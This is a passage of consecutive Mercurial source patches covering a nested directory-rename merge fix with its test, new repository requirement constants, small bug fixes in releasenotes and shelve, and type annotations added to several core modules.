unaccounted nonoverlapping files against directory moves for f in addedfilesfn(): if f not in fullcopy: - for d in dirmove: + for d in dirmove_children_first: if f.startswith(d): # new file added in a directory that was moved, move it df = dirmove[d] + f[len(d) :] diff --git a/tests/test-rename-dir-merge.t b/tests/test-rename-dir-merge.t --- a/tests/test-rename-dir-merge.t +++ b/tests/test-rename-dir-merge.t @@ -294,3 +294,45 @@ M t/t R a/s R a/t + + $ cd .. + + +Test that files are moved to a new directory based on the path prefix that +matches the most. dir1/ below gets renamed to dir2/, and dir1/subdir1/ gets +renamed to dir2/subdir2/. We want dir1/subdir1/newfile to move to +dir2/subdir2/ (not to dir2/subdir1/ as we would infer based on just the rename +of dir1/ to dir2/). + + $ hg init nested-renames + $ cd nested-renames + $ mkdir dir1 + $ echo a > dir1/file1 + $ echo b > dir1/file2 + $ mkdir dir1/subdir1 + $ echo c > dir1/subdir1/file3 + $ echo d > dir1/subdir1/file4 + $ hg ci -Aqm initial + $ hg mv dir1 dir2 + moving dir1/file1 to dir2/file1 + moving dir1/file2 to dir2/file2 + moving dir1/subdir1/file3 to dir2/subdir1/file3 + moving dir1/subdir1/file4 to dir2/subdir1/file4 + $ hg mv dir2/subdir1 dir2/subdir2 + moving dir2/subdir1/file3 to dir2/subdir2/file3 + moving dir2/subdir1/file4 to dir2/subdir2/file4 + $ hg ci -m 'move dir1/ to dir2/ and dir1/subdir1/ to dir2/subdir2/' + $ hg co 0 + 4 files updated, 0 files merged, 4 files removed, 0 files unresolved + $ echo e > dir1/subdir1/file5 + $ hg ci -Aqm 'add file in dir1/subdir1/' + $ hg merge 1 + 5 files updated, 0 files merged, 4 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg files + dir2/file1 + dir2/file2 + dir2/subdir2/file3 + dir2/subdir2/file4 + dir2/subdir2/file5 + $ cd .. # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614707478 -3600 # Tue Mar 02 18:51:18 2021 +0100 # Node ID e83327af26f158c21ceac95324dd4cb0e0bdfa96 # Parent ad30b29bc23de9533cc7367b5cdc6a925c96898d pure-parsers: document index class constants This also adds the big endian prefix `>` to make the constants truly platform-independent, even if no issue with this has been reported in the wild. Differential Revision: https://phab.mercurial-scm.org/D10104 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -42,10 +42,15 @@ class BaseIndexObject(object): + # Format of an index entry according to Python's `struct` language index_format = b">Qiiiiii20s12x" - big_int_size = struct.calcsize(b'Q') - int_size = struct.calcsize(b'i') + # Size of a C unsigned long long int, platform independent + big_int_size = struct.calcsize(b'>Q') + # Size of a C long int, platform independent + int_size = struct.calcsize(b'>i') + # Size of the entire index format index_size = struct.calcsize(index_format) + # An empty index entry, used as a default value to be overridden, or nullrev null_item = (0, 0, 0, -1, -1, -1, -1, nullid) @property # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614771204 -3600 # Wed Mar 03 12:33:24 2021 +0100 # Node ID c3773636ddbbf2e45f66622091f6dc92eb813af9 # Parent e83327af26f158c21ceac95324dd4cb0e0bdfa96 requirements: also add a dotencode constant Continue the cleanup to the remaining requirements Differential Revision: https://phab.mercurial-scm.org/D10107 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -944,9 +944,8 @@ """Construct a storage object for a repository.""" if b'store' in requirements: if b'fncache' in requirements: - return storemod.fncachestore( - path, vfstype, b'dotencode' in requirements - ) + dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements + return storemod.fncachestore(path, vfstype, dotencode) return storemod.encodedstore(path, vfstype) @@ -1215,7 +1214,7 @@ b'fncache', requirementsmod.SHARED_REQUIREMENT, requirementsmod.RELATIVE_SHARED_REQUIREMENT, - b'dotencode', + requirementsmod.DOTENCODE_REQUIREMENT, requirementsmod.SPARSE_REQUIREMENT, requirementsmod.INTERNAL_PHASE_REQUIREMENT, } @@ -3416,7 +3415,7 @@ if ui.configbool(b'format', b'usefncache'): requirements.add(b'fncache') if ui.configbool(b'format', b'dotencode'): - requirements.add(b'dotencode') + requirements.add(requirementsmod.DOTENCODE_REQUIREMENT) compengines = ui.configlist(b'format', b'revlog-compression') for compengine in compengines: diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -8,6 +8,7 @@ from __future__ import absolute_import GENERALDELTA_REQUIREMENT = b'generaldelta' +DOTENCODE_REQUIREMENT = b'dotencode' # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -217,7 +217,7 @@ class dotencode(requirementformatvariant): name = b'dotencode' - _requirement = b'dotencode' + _requirement = requirements.DOTENCODE_REQUIREMENT default = True @@ -934,7 +934,7 @@ Extensions should monkeypatch this to add their custom requirements. """ supported = { - b'dotencode', + requirements.DOTENCODE_REQUIREMENT, b'fncache', requirements.GENERALDELTA_REQUIREMENT, requirements.REVLOGV1_REQUIREMENT, @@ -965,7 +965,7 @@ future, unknown requirements from accidentally being added. """ supported = { - b'dotencode', + requirements.DOTENCODE_REQUIREMENT, b'fncache', requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614771329 -3600 # Wed Mar 03 12:35:29 2021 +0100 # Node ID ab58098bebed03f0e3e5c65ede72ab4deb2148f5 # Parent c3773636ddbbf2e45f66622091f6dc92eb813af9 requirements: also add a store constant Continue the cleanup to the remaining requirements Differential Revision: https://phab.mercurial-scm.org/D10108 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -942,7 +942,7 @@ def makestore(requirements, path, vfstype): """Construct a storage object for a repository.""" - if b'store' in requirements: + if requirementsmod.STORE_REQUIREMENT in requirements: if b'fncache' in requirements: dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements return storemod.fncachestore(path, vfstype, dotencode) @@ -1210,7 +1210,7 @@ requirementsmod.SHARESAFE_REQUIREMENT, } _basesupported = supportedformats | { - b'store', + requirementsmod.STORE_REQUIREMENT, b'fncache', requirementsmod.SHARED_REQUIREMENT, requirementsmod.RELATIVE_SHARED_REQUIREMENT, @@ -3411,7 +3411,7 @@ requirements = {requirementsmod.REVLOGV1_REQUIREMENT} if ui.configbool(b'format', b'usestore'): - requirements.add(b'store') + requirements.add(requirementsmod.STORE_REQUIREMENT) if ui.configbool(b'format', b'usefncache'): requirements.add(b'fncache') if ui.configbool(b'format', b'dotencode'): @@ -3493,7 +3493,7 @@ dropped = set() - if b'store' not in requirements: + if requirementsmod.STORE_REQUIREMENT not in requirements: if bookmarks.BOOKMARKS_IN_STORE_REQUIREMENT in requirements: ui.warn( _( @@ -3632,7 +3632,8 @@ hgvfs.mkdir(b'cache') hgvfs.mkdir(b'wcache') - if b'store' in requirements and b'sharedrepo' not in createopts: + has_store = requirementsmod.STORE_REQUIREMENT in requirements + if has_store and b'sharedrepo' not in createopts: hgvfs.mkdir(b'store') # We create an invalid changelog outside the store so very old diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -9,6 +9,7 @@ GENERALDELTA_REQUIREMENT = b'generaldelta' DOTENCODE_REQUIREMENT = b'dotencode' +STORE_REQUIREMENT = b'store' # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -859,7 +859,7 @@ # Introduced in Mercurial 0.9.2. requirements.REVLOGV1_REQUIREMENT, # Introduced in Mercurial 0.9.2. - b'store', + requirements.STORE_REQUIREMENT, } @@ -938,7 +938,7 @@ b'fncache', requirements.GENERALDELTA_REQUIREMENT, requirements.REVLOGV1_REQUIREMENT, - b'store', + requirements.STORE_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614771433 -3600 # Wed Mar 03 12:37:13 2021 +0100 # Node ID b4c2a2af25e2357ac948a161f5d946a2a1b1f96f # Parent ab58098bebed03f0e3e5c65ede72ab4deb2148f5 requirements: also add a fncache constant Continue the cleanup to the remaining requirements Differential Revision: https://phab.mercurial-scm.org/D10109 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -943,7 +943,7 @@ def makestore(requirements, path, vfstype): """Construct a storage object for a repository.""" if requirementsmod.STORE_REQUIREMENT in requirements: - if b'fncache' in requirements: + if requirementsmod.FNCACHE_REQUIREMENT in requirements: dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements return storemod.fncachestore(path, vfstype, dotencode) @@ -1211,7 +1211,7 @@ } _basesupported = supportedformats | { requirementsmod.STORE_REQUIREMENT, - b'fncache', + requirementsmod.FNCACHE_REQUIREMENT, requirementsmod.SHARED_REQUIREMENT, requirementsmod.RELATIVE_SHARED_REQUIREMENT, requirementsmod.DOTENCODE_REQUIREMENT, @@ -3413,7 +3413,7 @@ if ui.configbool(b'format', b'usestore'): requirements.add(requirementsmod.STORE_REQUIREMENT) if ui.configbool(b'format', b'usefncache'): - requirements.add(b'fncache') + requirements.add(requirementsmod.FNCACHE_REQUIREMENT) if ui.configbool(b'format', b'dotencode'): requirements.add(requirementsmod.DOTENCODE_REQUIREMENT) diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -443,7 +443,7 @@ """ repo = repo.unfiltered() - if b'fncache' not in repo.requirements: + if requirements.FNCACHE_REQUIREMENT not in repo.requirements: ui.warn( _( b'(not rebuilding fncache because repository does not ' diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -10,6 +10,7 @@ GENERALDELTA_REQUIREMENT = b'generaldelta' DOTENCODE_REQUIREMENT = b'dotencode' STORE_REQUIREMENT = b'store' +FNCACHE_REQUIREMENT = b'fncache' # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -197,7 +197,7 @@ class fncache(requirementformatvariant): name = b'fncache' - _requirement = b'fncache' + _requirement = requirements.FNCACHE_REQUIREMENT default = True @@ -935,7 +935,7 @@ """ supported = { requirements.DOTENCODE_REQUIREMENT, - b'fncache', + requirements.FNCACHE_REQUIREMENT, requirements.GENERALDELTA_REQUIREMENT, requirements.REVLOGV1_REQUIREMENT, requirements.STORE_REQUIREMENT, @@ -966,7 +966,7 @@ """ supported = { requirements.DOTENCODE_REQUIREMENT, - b'fncache', + requirements.FNCACHE_REQUIREMENT, requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615008745 -3600 # Sat Mar 06 06:32:25 2021 +0100 # Node ID 88bd085cf2f872962b62db97a17de8a7f2179499 # Parent b4c2a2af25e2357ac948a161f5d946a2a1b1f96f releasenotes: use the right API to access the 'sections' Preventing direct access to the underlying dict fix a breakage introduced by the refactoring in d3df397e7a59. This changeset is similar to 271dfcb98544, 5272542196cc and f7621fa14b84. The breackage of `releasenotes.py` stayed under my radar as the CI did not have fuzzywuzzy installed. (Something that is about to be fixed). Differential Revision: https://phab.mercurial-scm.org/D10121 diff --git a/hgext/releasenotes.py b/hgext/releasenotes.py --- a/hgext/releasenotes.py +++ b/hgext/releasenotes.py @@ -280,7 +280,7 @@ if b'.hgreleasenotes' in ctx: read(b'.hgreleasenotes') - return p[b'sections'] + return p.items(b'sections') def checkadmonitions(ui, repo, directives, revs): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615061302 18000 # Sat Mar 06 15:08:22 2021 -0500 # Node ID e571fec5b606667d062b7822589879a08324a1a8 # Parent 88bd085cf2f872962b62db97a17de8a7f2179499 shelve: fix conversion of exceptions to strings flagged by pytype I've seen this done several ways and don't know what's correct. But pytype was unhappy about the previous way: FAILED: /mnt/c/Users/Matt/hg/tests/.pytype/pyi/mercurial/shelve.pyi /usr/bin/python3.6 -m pytype.single --imports_info /mnt/c/Users/Matt/hg/tests/.pytype/imports/mercurial.shelve.imports --module-name mercurial.shelve -V 3.6 -o /mnt/c/Users/Matt/hg/tests/.pytype/pyi/mercurial/shelve.pyi --analyze-annotated --nofail --quick /mnt/c/Users/Matt/hg/mercurial/shelve.py File "/mnt/c/Users/Matt/hg/mercurial/shelve.py", line 244, in _verifyandtransform: Function bytestr.__init__ was called with the wrong arguments [wrong-arg-types] Expected: (self, ints: Iterable[int]) Actually passed: (self, ints: Union[KeyError, TypeError, ValueError]) File "/mnt/c/Users/Matt/hg/mercurial/shelve.py", line 253, in _getversion: Function bytestr.__init__ was called with the wrong arguments [wrong-arg-types] Expected: (self, ints: Iterable[int]) Actually passed: (self, ints: ValueError) The following methods aren't implemented on ValueError: __iter__ Differential Revision: https://phab.mercurial-scm.org/D10122 diff --git a/mercurial/shelve.py b/mercurial/shelve.py --- a/mercurial/shelve.py +++ b/mercurial/shelve.py @@ -241,7 +241,7 @@ bin(h) for h in d[b'nodestoremove'].split(b' ') ] except (ValueError, TypeError, KeyError) as err: - raise error.CorruptedState(pycompat.bytestr(err)) + raise error.CorruptedState(stringutil.forcebytestr(err)) @classmethod def _getversion(cls, repo): @@ -250,7 +250,7 @@ try: version = int(fp.readline().strip()) except ValueError as err: - raise error.CorruptedState(pycompat.bytestr(err)) + raise error.CorruptedState(stringutil.forcebytestr(err)) finally: fp.close() return version # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615062406 18000 # Sat Mar 06 15:26:46 2021 -0500 # Node ID 15c2f9220ae881ca91ee8b4314965e43493b3a41 # Parent e571fec5b606667d062b7822589879a08324a1a8 typing: add type annotations to mercurial/utils/dateutil.py For now, I'm just typing around the edges to help find issues with TortoiseHg. If the custom `hgdate` type is useful elsewhere as I go, I'll move it to a file dedicated to custom types. I'm not loving the ban on camelcase type names here that test-check-code.t flagged, but I'm not sure how to disable that even if everyone agreed that it's a bad idea to go against the normal convention for types. While here, fix an issue that pytype found in `parsedate` when an invalid date tuple is passed by raising a ProgrammingError instead of crashing. (Tuple doesn't have a `strip` attribute.) Differential Revision: https://phab.mercurial-scm.org/D10123 diff --git a/mercurial/utils/dateutil.py b/mercurial/utils/dateutil.py --- a/mercurial/utils/dateutil.py +++ b/mercurial/utils/dateutil.py @@ -18,6 +18,18 @@ pycompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Callable, + Dict, + Iterable, + Optional, + Tuple, + Union, + ) + + hgdate = Tuple[float, int] # (unixtime, offset) + # used by parsedate defaultdateformats = ( b'%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601 @@ -62,6 +74,7 @@ def makedate(timestamp=None): + # type: (Optional[float]) -> hgdate """Return a unix timestamp (or the current time) as a (unixtime, offset) tuple based off the local timezone.""" if timestamp is None: @@ -79,6 +92,7 @@ def datestr(date=None, format=b'%a %b %d %H:%M:%S %Y %1%2'): + # type: (Optional[hgdate], bytes) -> bytes """represent a (unixtime, offset) tuple as a localized time. unixtime is seconds since the epoch, and offset is the time zone's number of seconds away from UTC. @@ -116,11 +130,13 @@ def shortdate(date=None): + # type: (Optional[hgdate]) -> bytes """turn (timestamp, tzoff) tuple into iso 8631 date.""" return datestr(date, format=b'%Y-%m-%d') def parsetimezone(s): + # type: (bytes) -> Tuple[Optional[int], bytes] """find a trailing timezone, if any, in string, and return a (offset, remainder) pair""" s = pycompat.bytestr(s) @@ -156,6 +172,7 @@ def strdate(string, format, defaults=None): + # type: (bytes, bytes, Optional[Dict[bytes, Tuple[bytes, bytes]]]) -> hgdate """parse a localized time string and return a (unixtime, offset) tuple. if the string cannot be parsed, ValueError is raised.""" if defaults is None: @@ -198,6 +215,7 @@ def parsedate(date, formats=None, bias=None): + # type: (Union[bytes, hgdate], Optional[Iterable[bytes]], Optional[Dict[bytes, bytes]]) -> hgdate """parse a localized date/time and return a (unixtime, offset) tuple. The date may be a "unixtime offset" string or in one of the specified @@ -223,8 +241,11 @@ bias = {} if not date: return 0, 0 - if isinstance(date, tuple) and len(date) == 2: - return date + if isinstance(date, tuple): + if len(date) == 2: + return date + else: + raise error.ProgrammingError(b"invalid date format") if not formats: formats = defaultdateformats date = date.strip() @@ -284,6 +305,7 @@ def matchdate(date): + # type: (bytes) -> Callable[[float], bool] """Return a function that matches a given date match specifier Formats include: @@ -313,10 +335,12 @@ """ def lower(date): + # type: (bytes) -> float d = {b'mb': b"1", b'd': b"1"} return parsedate(date, extendeddateformats, d)[0] def upper(date): + # type: (bytes) -> float d = {b'mb': b"12", b'HI': b"23", b'M': b"59", b'S': b"59"} for days in (b"31", b"30", b"29"): try: # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615064303 18000 # Sat Mar 06 15:58:23 2021 -0500 # Node ID b9f40b743627f35e85aae9fb520a02aab5afc277 # Parent 15c2f9220ae881ca91ee8b4314965e43493b3a41 typing: add type annotations to mercurial/i18n.py I'm a little unsure of this because `gettext()` clearly allows for passing unicode. But the comments seem to indicate that this is related to tests, and this was useful for catching unicode being passed to `_()` in the keyring extension. I'm also not sure why `_(None)` would make any sense, so maybe the argument shouldn't be optional? I didn't add it to the lambda in plain mode because that spilled beyond 80 characters and so black mangled it. Black and pytype disagree on where the comment to disable a check needs to go, so this has to disable and then enable the checking. Differential Revision: https://phab.mercurial-scm.org/D10124 diff --git a/mercurial/i18n.py b/mercurial/i18n.py --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -19,6 +19,14 @@ pycompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Callable, + List, + Optional, + ) + + # modelled after templater.templatepath: if getattr(sys, 'frozen', None) is not None: module = pycompat.sysexecutable @@ -40,7 +48,10 @@ try: import ctypes + # pytype: disable=module-attr langid = ctypes.windll.kernel32.GetUserDefaultUILanguage() + # pytype: enable=module-attr + _languages = [locale.windows_locale[langid]] except (ImportError, AttributeError, KeyError): # ctypes not found or unknown langid @@ -51,7 +62,7 @@ localedir = os.path.join(datapath, 'locale') t = gettextmod.translation('hg', localedir, _languages, fallback=True) try: - _ugettext = t.ugettext + _ugettext = t.ugettext # pytype: disable=attribute-error except AttributeError: _ugettext = t.gettext @@ -60,6 +71,7 @@ def gettext(message): + # type: (Optional[bytes]) -> Optional[bytes] """Translate message. The message is looked up in the catalog to get a Unicode string, @@ -77,7 +89,7 @@ if message not in cache: if type(message) is pycompat.unicode: # goofy unicode docstrings in test - paragraphs = message.split(u'\n\n') + paragraphs = message.split(u'\n\n') # type: List[pycompat.unicode] else: # should be ascii, but we have unicode docstrings in test, which # are converted to utf-8 bytes on Python 3. @@ -110,6 +122,6 @@ if _plain(): - _ = lambda message: message + _ = lambda message: message # type: Callable[[bytes], bytes] else: _ = gettext # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615071129 18000 # Sat Mar 06 17:52:09 2021 -0500 # Node ID eef13b940887a0ed0129e50f2058f1532cce4920 # Parent b9f40b743627f35e85aae9fb520a02aab5afc277 typing: add type annotations to the public methods of mercurial/subrepoutil.py Differential Revision: https://phab.mercurial-scm.org/D10125 diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -27,8 +27,29 @@ nullstate = (b'', b'', b'empty') +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Dict, + List, + Optional, + Set, + Tuple, + ) + from . import ( + context, + localrepo, + match as matchmod, + scmutil, + subrepo, + ui as uimod, + ) + + Substate = Dict[bytes, Tuple[bytes, bytes, bytes]] + def state(ctx, ui): + # type: (context.changectx, uimod.ui) -> Substate """return a state dict, mapping subrepo paths configured in .hgsub to tuple: (source from .hgsub, revision from .hgsubstate, kind (key in types dict)) @@ -84,6 +105,7 @@ raise def remap(src): + # type: (bytes) -> bytes for pattern, repl in p.items(b'subpaths'): # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub # does a string decode. @@ -105,7 +127,7 @@ return src state = {} - for path, src in p.items(b''): + for path, src in p.items(b''): # type: bytes kind = b'hg' if src.startswith(b'['): if b']' not in src: @@ -136,6 +158,7 @@ def writestate(repo, state): + # type: (localrepo.localrepository, Substate) -> None """rewrite .hgsubstate in (outer) repo with these subrepo states""" lines = [ b'%s %s\n' % (state[s][1], s) @@ -146,6 +169,8 @@ def submerge(repo, wctx, mctx, actx, overwrite, labels=None): + # type: (localrepo.localrepository, context.workingctx, context.changectx, context.changectx, bool, Optional[Any]) -> Substate + # TODO: type the `labels` arg """delegated from merge.applyupdates: merging of .hgsubstate file in working context, merging context and ancestor context""" if mctx == actx: # backwards? @@ -285,6 +310,7 @@ def precommit(ui, wctx, status, match, force=False): + # type: (uimod.ui, context.workingcommitctx, scmutil.status, matchmod.basematcher, bool) -> Tuple[List[bytes], Set[bytes], Substate] """Calculate .hgsubstate changes that should be applied before committing Returns (subs, commitsubs, newstate) where @@ -355,6 +381,7 @@ def reporelpath(repo): + # type: (localrepo.localrepository) -> bytes """return path to this (sub)repo as seen from outermost repo""" parent = repo while util.safehasattr(parent, b'_subparent'): @@ -363,11 +390,13 @@ def subrelpath(sub): + # type: (subrepo.abstractsubrepo) -> bytes """return path to this subrepo as seen from outermost repo""" return sub._relpath def _abssource(repo, push=False, abort=True): + # type: (localrepo.localrepository, bool, bool) -> Optional[bytes] """return pull/push path of repo - either based on parent repo .hgsub info or on the top repo config. Abort or return None if no source found.""" if util.safehasattr(repo, b'_subparent'): @@ -416,6 +445,7 @@ def newcommitphase(ui, ctx): + # type: (uimod.ui, context.changectx) -> int commitphase = phases.newcommitphase(ui) substate = getattr(ctx, "substate", None) if not substate: # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615074693 18000 # Sat Mar 06 18:51:33 2021 -0500 # Node ID 77e129be10de427144d7cd7c1b3575e5240390c6 # Parent eef13b940887a0ed0129e50f2058f1532cce4920 typing: add some type annotations to mercurial/phases.py Some of these were helpful in typing other modules, and then I typed the easy-ish ones. Black forces the long `Phasedefaults` definition to be wrapped, which pytype seems OK with (as shown with `reveal_type()`), but it does seem to confuse PyCharm a bit. Differential Revision: https://phab.mercurial-scm.org/D10126 diff --git a/mercurial/phases.py b/mercurial/phases.py --- a/mercurial/phases.py +++ b/mercurial/phases.py @@ -127,10 +127,32 @@ util, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Callable, + Dict, + Iterable, + List, + Optional, + Set, + Tuple, + ) + from . import ( + localrepo, + ui as uimod, + ) + + Phaseroots = Dict[int, Set[bytes]] + Phasedefaults = List[ + Callable[[localrepo.localrepository, Phaseroots], Phaseroots] + ] + + _fphasesentry = struct.Struct(b'>i20s') # record phase index -public, draft, secret = range(3) +public, draft, secret = range(3) # type: int archived = 32 # non-continuous for compatibility internal = 96 # non-continuous for compatibility allphases = (public, draft, secret, archived, internal) @@ -154,11 +176,13 @@ def supportinternal(repo): + # type: (localrepo.localrepository) -> bool """True if the internal phase can be used on a repository""" return requirements.INTERNAL_PHASE_REQUIREMENT in repo.requirements def _readroots(repo, phasedefaults=None): + # type: (localrepo.localrepository, Optional[Phasedefaults]) -> Tuple[Phaseroots, bool] """Read phase roots from disk phasedefaults is a list of fn(repo, roots) callable, which are @@ -191,6 +215,7 @@ def binaryencode(phasemapping): + # type: (Dict[int, List[bytes]]) -> bytes """encode a 'phase -> nodes' mapping into a binary stream The revision lists are encoded as (phase, root) pairs. @@ -203,6 +228,7 @@ def binarydecode(stream): + # type: (...) -> Dict[int, List[bytes]] """decode a binary stream into a 'phase -> nodes' mapping The (phase, root) pairs are turned back into a dictionary with @@ -321,6 +347,7 @@ class phasecache(object): def __init__(self, repo, phasedefaults, _load=True): + # type: (localrepo.localrepository, Optional[Phasedefaults], bool) -> None if _load: # Cheap trick to allow shallow-copy without copy module self.phaseroots, self.dirty = _readroots(repo, phasedefaults) @@ -330,6 +357,7 @@ self.opener = repo.svfs def hasnonpublicphases(self, repo): + # type: (localrepo.localrepository) -> bool """detect if there are revisions with non-public phase""" repo = repo.unfiltered() cl = repo.changelog @@ -343,6 +371,7 @@ ) def nonpublicphaseroots(self, repo): + # type: (localrepo.localrepository) -> Set[bytes] """returns the roots of all non-public phases The roots are not minimized, so if the secret revisions are @@ -362,6 +391,8 @@ ) def getrevset(self, repo, phases, subset=None): + # type: (localrepo.localrepository, Iterable[int], Optional[Any]) -> Any + # TODO: finish typing this """return a smartset for the given phases""" self.loadphaserevs(repo) # ensure phase's sets are loaded phases = set(phases) @@ -457,6 +488,7 @@ self._loadedrevslen = len(cl) def loadphaserevs(self, repo): + # type: (localrepo.localrepository) -> None """ensure phase information is loaded in the object""" if self._phasesets is None: try: @@ -470,6 +502,7 @@ self._phasesets = None def phase(self, repo, rev): + # type: (localrepo.localrepository, int) -> int # We need a repo argument here to be able to build _phasesets # if necessary. The repository instance is not stored in # phasecache to avoid reference cycles. The changelog instance @@ -652,6 +685,7 @@ return False def filterunknown(self, repo): + # type: (localrepo.localrepository) -> None """remove unknown nodes from the phase boundary Nothing is lost as unknown nodes only hold data for their descendants. @@ -729,6 +763,7 @@ def listphases(repo): + # type: (localrepo.localrepository) -> Dict[bytes, bytes] """List phases root for serialization over pushkey""" # Use ordered dictionary so behavior is deterministic. keys = util.sortdict() @@ -760,6 +795,7 @@ def pushphase(repo, nhex, oldphasestr, newphasestr): + # type: (localrepo.localrepository, bytes, bytes, bytes) -> bool """List phases root for serialization over pushkey""" repo = repo.unfiltered() with repo.lock(): @@ -909,6 +945,7 @@ def newcommitphase(ui): + # type: (uimod.ui) -> int """helper to get the target phase of new commit Handle all possible values for the phases.new-commit options. @@ -924,11 +961,13 @@ def hassecret(repo): + # type: (localrepo.localrepository) -> bool """utility function that check if a repo have any secret changeset.""" return bool(repo._phasecache.phaseroots[secret]) def preparehookargs(node, old, new): + # type: (bytes, Optional[int], Optional[int]) -> Dict[bytes, bytes] if old is None: old = b'' else: # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615092092 18000 # Sat Mar 06 23:41:32 2021 -0500 # Node ID 7711853110b9be20bdb68a2f0f90d3a527ac29ff # Parent 77e129be10de427144d7cd7c1b3575e5240390c6 typing: add some type annotations to mercurial/util.py Differential Revision: https://phab.mercurial-scm.org/D10127 diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -59,6 +59,16 @@ stringutil, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Iterator, + List, + Optional, + Tuple, + Union, + ) + + base85 = policy.importmod('base85') osutil = policy.importmod('osutil') @@ -133,6 +143,7 @@ def setumask(val): + # type: (int) -> None ''' updates the umask. used by chg server ''' if pycompat.iswindows: return @@ -307,7 +318,7 @@ try: - buffer = buffer + buffer = buffer # pytype: disable=name-error except NameError: def buffer(sliceable, offset=0, length=None): @@ -1833,6 +1844,7 @@ def pathto(root, n1, n2): + # type: (bytes, bytes, bytes) -> bytes """return the relative path from one place to another. root should use os.sep to separate directories n1 should use os.sep to separate directories @@ -2017,6 +2029,7 @@ def checkwinfilename(path): + # type: (bytes) -> Optional[bytes] r"""Check that the base-relative path is a valid filename on Windows. Returns None if the path is ok, or a UI string describing the problem. @@ -2111,6 +2124,7 @@ def readlock(pathname): + # type: (bytes) -> bytes try: return readlink(pathname) except OSError as why: @@ -2134,6 +2148,7 @@ def fscasesensitive(path): + # type: (bytes) -> bool """ Return true if the given path is on a case-sensitive filesystem @@ -2215,6 +2230,7 @@ def fspath(name, root): + # type: (bytes, bytes) -> bytes """Get name in the case stored in the filesystem The name should be relative to root, and be normcase-ed for efficiency. @@ -2259,6 +2275,7 @@ def checknlink(testfile): + # type: (bytes) -> bool '''check whether hardlink count reporting works properly''' # testfile may be open, so we need a separate file for checking to @@ -2292,8 +2309,9 @@ def endswithsep(path): + # type: (bytes) -> bool '''Check path ends with os.sep or os.altsep.''' - return ( + return bool( # help pytype path.endswith(pycompat.ossep) or pycompat.osaltsep and path.endswith(pycompat.osaltsep) @@ -2301,6 +2319,7 @@ def splitpath(path): + # type: (bytes) -> List[bytes] """Split path by os.sep. Note that this function does not use os.altsep because this is an alternative of simple "xxx.split(os.sep)". @@ -2529,6 +2548,7 @@ def unlinkpath(f, ignoremissing=False, rmdir=True): + # type: (bytes, bool, bool) -> None """unlink and remove the directory if it is empty""" if ignoremissing: tryunlink(f) @@ -2543,6 +2563,7 @@ def tryunlink(f): + # type: (bytes) -> None """Attempt to remove a file, ignoring ENOENT errors.""" try: unlink(f) @@ -2552,6 +2573,7 @@ def makedirs(name, mode=None, notindexed=False): + # type: (bytes, Optional[int], bool) -> None """recursive directory creation with parent mode inheritance Newly created directories are marked as "not to be indexed by @@ -2581,16 +2603,19 @@ def readfile(path): + # type: (bytes) -> bytes with open(path, b'rb') as fp: return fp.read() def writefile(path, text): + # type: (bytes, bytes) -> None with open(path, b'wb') as fp: 